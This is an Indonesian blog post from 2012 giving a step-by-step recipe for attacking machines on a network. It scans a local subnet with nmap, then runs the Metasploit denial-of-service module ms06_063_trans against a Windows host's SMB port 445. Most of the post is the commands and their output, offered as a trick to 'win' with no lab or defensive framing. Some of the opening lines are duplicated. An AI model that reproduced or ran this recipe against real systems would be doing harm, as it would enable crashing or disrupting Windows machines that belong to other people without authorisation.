store science
Sabtu, 11 Februari 2012
Tricks Exploit to win
Dan kali ini saya akan menjelaskan dan menjalankan script explot yang saya sudah sering saya lakukan, dan apa saja yang dibutuhkan untuk menjalankan scriptnya adalah sebagai berikut :
1. Nmap
2. Metasploit
Caranya sebagai berikut :
1. Nmap
2. Metasploit
Caranya sebagai berikut :
1. buka terminal ketik : $ nmap (ip target)/24 *untuk scan ip dan port yang terbuka
Ex: $ nmap 192.168.1.1/24
Hasilnya:
Starting Nmap 5.61TEST2 ( http://nmap.org ) at 2011-12-19 23:48 WIT
Nmap scan report for 192.168.1.1
Host is up (0.0011s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE
21/tcp open ftp
23/tcp open telnet
80/tcp open http
MAC Address: 54:E6:FC:B5:F5:C7 (Tp-link Technologies CO.)
Nmap scan report for 192.168.1.2
Host is up (0.00034s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:0D:9D:9E:E3:5E (Hewlett-Packard Company)
Nmap scan report for 192.168.1.3
Host is up (0.00034s latency).
All 1000 scanned ports on 192.168.1.3 are filtered
MAC Address: 00:30:18:00:4A:A4 (Jetway Information Co.)
Nmap scan report for 192.168.1.4
Host is up (0.000013s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
23/tcp open telnet
Nmap done: 256 IP addresses (4 hosts up) scanned in 20.20 seconds
2. selanjutnya ketik : $ msfconsole *untuk buka metasploit
3. lalu ketik : $ use dos/windows/smb/ms06_063_trans *untuk membuka settingannya kalo ga salah
Ex: msf> use dos/windows/smb/ms06_063_trans
4. lalu ketik : auxiliary(ms06_063_trans) > set LPORT (masukkan port hasil scan yang tadi)
Ex: set LPORT 445
5. lalu ketik : auxiliary(ms06_063_trans) > set RHOST (masukkan ip target)
Ex: set RHOST 192.168.1.2
6. terakhir ketik : auxiliary(ms06_063_trans) > exploit
Hasilnya:
[*] Connecting to the target system...
[*] Sending bad SMB transaction request 1...
[*] Sending bad SMB transaction request 2...
[*] Sending bad SMB transaction request 3...
[*] Sending bad SMB transaction request 4...
[*] Sending bad SMB transaction request 5...
[*] Auxiliary module execution completed
Label:
Expoit